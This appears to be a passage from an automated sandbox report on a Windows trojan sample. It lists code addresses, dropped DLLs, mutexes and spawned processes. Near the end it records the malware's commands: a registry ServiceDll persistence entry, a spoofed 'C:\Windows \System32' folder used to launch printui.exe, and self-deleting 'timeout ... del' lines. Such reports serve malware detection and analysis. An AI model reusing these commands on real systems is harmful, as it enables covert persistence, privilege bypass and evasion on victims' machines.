    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4C61049_2_00007FF8B7E4C610
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9059049_2_00007FF8B7E90590
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA055049_2_00007FF8B7EA0550
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9E4E049_2_00007FF8B7E9E4E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7835049_2_00007FF8B7E78350
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9A2E049_2_00007FF8B7E9A2E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E522E049_2_00007FF8B7E522E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBC28049_2_00007FF8B7EBC280
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6C24049_2_00007FF8B7E6C240
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3221049_2_00007FF8B7E32210
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7C21049_2_00007FF8B7E7C210
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8F0F049_2_00007FF8B7E8F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA70A049_2_00007FF8B7EA70A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E92FA049_2_00007FF8B7E92FA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E40EB049_2_00007FF8B7E40EB0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7EDC049_2_00007FF8B7E7EDC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E94CD049_2_00007FF8B7E94CD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA4CC049_2_00007FF8B7EA4CC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E88B6049_2_00007FF8B7E88B60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9CB3049_2_00007FF8B7E9CB30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5CA9049_2_00007FF8B7E5CA90
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB69E049_2_00007FF8B7EB69E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80E49E049_2_00007FF8B80E49E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80FAA5249_2_00007FF8B80FAA52
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8116B5049_2_00007FF8B8116B50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81204A649_2_00007FF8B81204A6
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80EBA4049_2_00007FF8B80EBA40
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8112B6049_2_00007FF8B8112B60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80D2B8049_2_00007FF8B80D2B80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80D1C3049_2_00007FF8B80D1C30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80D3D5049_2_00007FF8B80D3D50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8113D8049_2_00007FF8B8113D80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B810CDD049_2_00007FF8B810CDD0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B810FE3049_2_00007FF8B810FE30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80FBE3049_2_00007FF8B80FBE30
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B811CEC049_2_00007FF8B811CEC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80DEFC049_2_00007FF8B80DEFC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80D3FE049_2_00007FF8B80D3FE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80CF0C049_2_00007FF8B80CF0C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81100D049_2_00007FF8B81100D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B810A3A049_2_00007FF8B810A3A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80FA4A449_2_00007FF8B80FA4A4
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B81174F049_2_00007FF8B81174F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80FB4E049_2_00007FF8B80FB4E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80FF50049_2_00007FF8B80FF500
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B811867049_2_00007FF8B8118670
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80F16F049_2_00007FF8B80F16F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80FC7B049_2_00007FF8B80FC7B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B08D7049_2_00007FF8B8B08D70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8AF6AE049_2_00007FF8B8AF6AE0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B0344049_2_00007FF8B8B03440
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B0DF0049_2_00007FF8B8B0DF00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B0E8E049_2_00007FF8B8B0E8E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B108B049_2_00007FF8B8B108B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B0E82049_2_00007FF8B8B0E820
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B93C2A2049_2_00007FF8B93C2A20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B93CD08049_2_00007FF8B93CD080
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC09AD1055_2_00007FF6BC09AD10
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC087D6055_2_00007FF6BC087D60
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC09A5CA55_2_00007FF6BC09A5CA
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0B95E855_2_00007FF6BC0B95E8
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0AC5DC55_2_00007FF6BC0AC5DC
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC08DE2055_2_00007FF6BC08DE20
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0B665055_2_00007FF6BC0B6650
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC099E6955_2_00007FF6BC099E69
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0B86A455_2_00007FF6BC0B86A4
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0876D055_2_00007FF6BC0876D0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC08A6F055_2_00007FF6BC08A6F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC09973055_2_00007FF6BC099730
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0A9F5055_2_00007FF6BC0A9F50
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0BCF6455_2_00007FF6BC0BCF64
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC072F9055_2_00007FF6BC072F90
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0A57C055_2_00007FF6BC0A57C0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0967F055_2_00007FF6BC0967F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0C200055_2_00007FF6BC0C2000
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0B88A855_2_00007FF6BC0B88A8
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0880A055_2_00007FF6BC0880A0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0750D055_2_00007FF6BC0750D0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC07218055_2_00007FF6BC072180
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC09A21055_2_00007FF6BC09A210
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0CD20C55_2_00007FF6BC0CD20C
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC072A1055_2_00007FF6BC072A10
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC087A2055_2_00007FF6BC087A20
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0C624055_2_00007FF6BC0C6240
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0B8AAC55_2_00007FF6BC0B8AAC
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC085AE055_2_00007FF6BC085AE0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0C2B1055_2_00007FF6BC0C2B10
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC07437055_2_00007FF6BC074370
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC08239055_2_00007FF6BC082390
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC08738055_2_00007FF6BC087380
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0883E055_2_00007FF6BC0883E0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0CB48455_2_00007FF6BC0CB484
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0CCCB455_2_00007FF6BC0CCCB4
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0C249855_2_00007FF6BC0C2498
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80E49E055_2_00007FF8B80E49E0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80FAA5255_2_00007FF8B80FAA52
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80EBA4055_2_00007FF8B80EBA40
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8112B6055_2_00007FF8B8112B60
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8116B5055_2_00007FF8B8116B50
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80D2B8055_2_00007FF8B80D2B80
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80D1C3055_2_00007FF8B80D1C30
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80D3D5055_2_00007FF8B80D3D50
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8113D8055_2_00007FF8B8113D80
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B810CDD055_2_00007FF8B810CDD0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B810FE3055_2_00007FF8B810FE30
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80FBE3055_2_00007FF8B80FBE30
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B811CEC055_2_00007FF8B811CEC0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80DEFC055_2_00007FF8B80DEFC0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80D3FE055_2_00007FF8B80D3FE0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80CF0C055_2_00007FF8B80CF0C0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81100D055_2_00007FF8B81100D0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B810A3A055_2_00007FF8B810A3A0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81204A655_2_00007FF8B81204A6
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80FA4A455_2_00007FF8B80FA4A4
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B81174F055_2_00007FF8B81174F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80FB4E055_2_00007FF8B80FB4E0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80FF50055_2_00007FF8B80FF500
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B811867055_2_00007FF8B8118670
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80F16F055_2_00007FF8B80F16F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80FC7B055_2_00007FF8B80FC7B0
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\libcurl.dll 36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\zlib1.dll 7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: String function: 00007FF745003740 appears 81 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7E68330 appears 65 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBEDF0 appears 844 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8B11AB0 appears 77 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B810E230 appears 37 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B80D4D20 appears 44 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B80F4D90 appears 42 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE926 appears 36 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8113D10 appears 31 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE1CA appears 1339 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8B02C50 appears 63 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8B02D70 appears 260 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE0FE appears 63 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE896 appears 148 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8B176EA appears 38 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7E683C0 appears 71 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B80D4BB0 appears 52 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B810E2A0 appears 83 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7E78FD0 appears 105 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE8A2 appears 128 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B80D4A70 appears 478 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE104 appears 461 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8B02CD0 appears 48 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE10A appears 59 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B80F4EB0 appears 39 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B81046D0 appears 45 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE27E appears 39 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B7EBE278 appears 32 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B80D4B60 appears 330 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7EA46D0 appears 45 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7E74D20 appears 44 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7E94D90 appears 42 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7E74A70 appears 478 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7EAE2A0 appears 83 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7E74B60 appears 330 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7E94EB0 appears 39 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7EB3D10 appears 31 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF6CF973670 appears 94 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7EAE230 appears 37 times
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: String function: 00007FF8B7E74BB0 appears 52 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8113D10 appears 31 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B80D4A70 appears 478 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B80D4BB0 appears 52 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF6BC073700 appears 97 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B80F4EB0 appears 39 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B81046D0 appears 45 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B810E2A0 appears 83 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B810E230 appears 37 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B80D4D20 appears 44 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B80D4B60 appears 330 times
    Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B80F4D90 appears 42 times
    Source: libwinpthread-1.dll.14.drStatic PE information: Number of sections : 12 > 10
    Source: prnttemp.dll.5.drStatic PE information: Number of sections : 11 > 10
    Source: libintl-9.dll.14.drStatic PE information: Number of sections : 20 > 10
    Source: libiconv-2.dll.14.drStatic PE information: Number of sections : 20 > 10
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, 00000000.00000000.2007029144.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, 00000000.00000000.2007029144.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeBinary or memory string: OriginalFilenamelibcurl.dllB vs SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeBinary or memory string: OriginalFilenamezlib1.dll* vs SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f
    Source: Process Memory Space: powershell.exe PID: 6184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.troj.evad.winEXE@209/117@10/9
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8B159C0 GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,49_2_00007FF8B8B159C0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeFile created: C:\Users\user\Desktop\curlapp64.exeJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4280:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3452:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3724:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1216:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3836:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4996:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvusab2p.s4m.ps1Jump to behavior
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeReversingLabs: Detection: 39%
    Source: svchost.exeString found in binary or memory: -start
    Source: svchost.exeString found in binary or memory: -addr
    Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: unknownProcess created: C:\Users\user\Desktop\curlapp64.exe "C:\Users\user\Desktop\curlapp64.exe"
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Users\user\Desktop\curlapp64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
